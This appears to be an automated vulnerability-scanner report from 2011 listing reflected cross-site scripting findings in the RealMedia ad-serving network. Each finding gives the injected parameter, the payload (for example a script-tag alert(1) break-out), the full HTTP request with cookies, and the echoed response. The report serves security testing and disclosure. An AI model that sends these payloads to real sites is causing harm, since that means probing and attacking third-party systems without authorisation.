HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:13 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxITO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2019 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:13 GMT;path=/
<script type="text/javascript"> function pr_swfver(){ var osf,osfd,i,axo=1,v=0,nv=navigator; if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf. ...[SNIP]... <script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=ectnews/runofnetwork/160x600/autnwsrlsttcha4bb6"><script>alert(1)</script>d1d8b8f699e/ss/a/L7&mm_flag="> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5151"><script>alert(1)</script>05718c70aef was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ssb5151"><script>alert(1)</script>05718c70aef/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:25 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIfO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 925 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:25 GMT;path=/
The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2c16"%3b16910890166 was submitted in the REST URL parameter 8. This input was echoed as f2c16";16910890166 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/f2c16"%3b16910890166/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:33 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxInO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 871 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:33 GMT;path=/
The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad9b5"-alert(1)-"ae5167346a4 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ad9b5"-alert(1)-"ae5167346a4/a@x10 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 20:51:37 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011Pk0inO1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 1968 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 20:52:37 GMT;path=/
<script type="text/javascript"> function pr_swfver(){ var osf,osfd,i,axo=1,v=0,nv=navigator; if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf. ...[SNIP]... r_d.getMinutes()+"|"+-pr_d.getTimezoneOffset()/60; var pr_postal=""; var pr_data=""; var pr_redir="http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ad9b5"-alert(1)-"ae5167346a4/a/L7/1602226044/x10/USNetwork/BCN2010090393_019_HRBlock/hrblock_cc_160.html/726348573830307044726341416f7670?$CTURL$"; var pr_pos=""; var prHost=(("https:"==document.location.protocol)?"https://":"h ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e41"><script>alert(1)</script>fd9b0b18fed was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/160x600/autnwsrlsttch/ss/a@x1071e41"><script>alert(1)</script>fd9b0b18fed HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:37 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIr; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 365 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:37 GMT;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4229b"><script>alert(1)</script>e77cb2f0e34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews4229b"><script>alert(1)</script>e77cb2f0e34/runofnetwork/300x250/autnwsrlsttch/ss/a@x15 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:00 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIG; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 373 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:00 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88d7c"><script>alert(1)</script>627af51db03 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork88d7c"><script>alert(1)</script>627af51db03/300x250/autnwsrlsttch/ss/a@x15 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:02 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIIO3016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 520 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0d45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:02 GMT;path=/
<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag ---> <script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11196345589@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork88d7c"><script>alert(1)</script>627af51db03/300x250/autnwsrlsttch/ss/a/L7/1196345589/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8098"><script>alert(1)</script>84786c535a5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250c8098"><script>alert(1)</script>84786c535a5/autnwsrlsttch/ss/a@x15 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:04 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIKO10167S|O3016Kj|O1016PY; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 520 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:04 GMT;path=/
<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag ---> <script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11544219975@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250c8098"><script>alert(1)</script>84786c535a5/autnwsrlsttch/ss/a/L7/1544219975/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c098"><script>alert(1)</script>a29bb87f7c3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch5c098"><script>alert(1)</script>a29bb87f7c3/ss/a@x15 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:06 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIMO1016Kj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 520 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:06 GMT;path=/
<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag ---> <script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11590386625@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch5c098"><script>alert(1)</script>a29bb87f7c3/ss/a/L7/1590386625/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42efc"><script>alert(1)</script>916717c49c8 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss42efc"><script>alert(1)</script>916717c49c8/a@x15 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:08 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIOO5016Kj; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 520 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:09 GMT;path=/
<!--- Start of 247B3/RadioShack/SELL_2011Q1/RTG/300_B3AdTag ---> <script LANGUAGE="JavaScript1.1" SRC="http://b3.mookie1.com/3/247B3/RadioShack/SELL_2011Q1/RTG/300/11842730930@x90?http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss42efc"><script>alert(1)</script>916717c49c8/a/L7/1842730930/x15/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_300.html/726348573830307044726341416f7670?"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9609f"><script>alert(1)</script>48098e26502 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x159609f"><script>alert(1)</script>48098e26502 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:11 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIR; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 364 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:11 GMT;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c808"><script>alert(1)</script>ba65244ab6a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/ectnews9c808"><script>alert(1)</script>ba65244ab6a/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.technewsworld.com/story/Okta-Offers-Cloud-Crazy-Enterprises-a-Master-Key-71751.html?wlc=1296491477 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of
Response
HTTP/1.1 200 OK Date: Mon, 31 Jan 2011 17:12:00 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: RMFD=011PjxIG; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 372 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Mon, 31-Jan-2011 17:13:00 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febad"><script>alert(1)</script>82ddd457fa8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
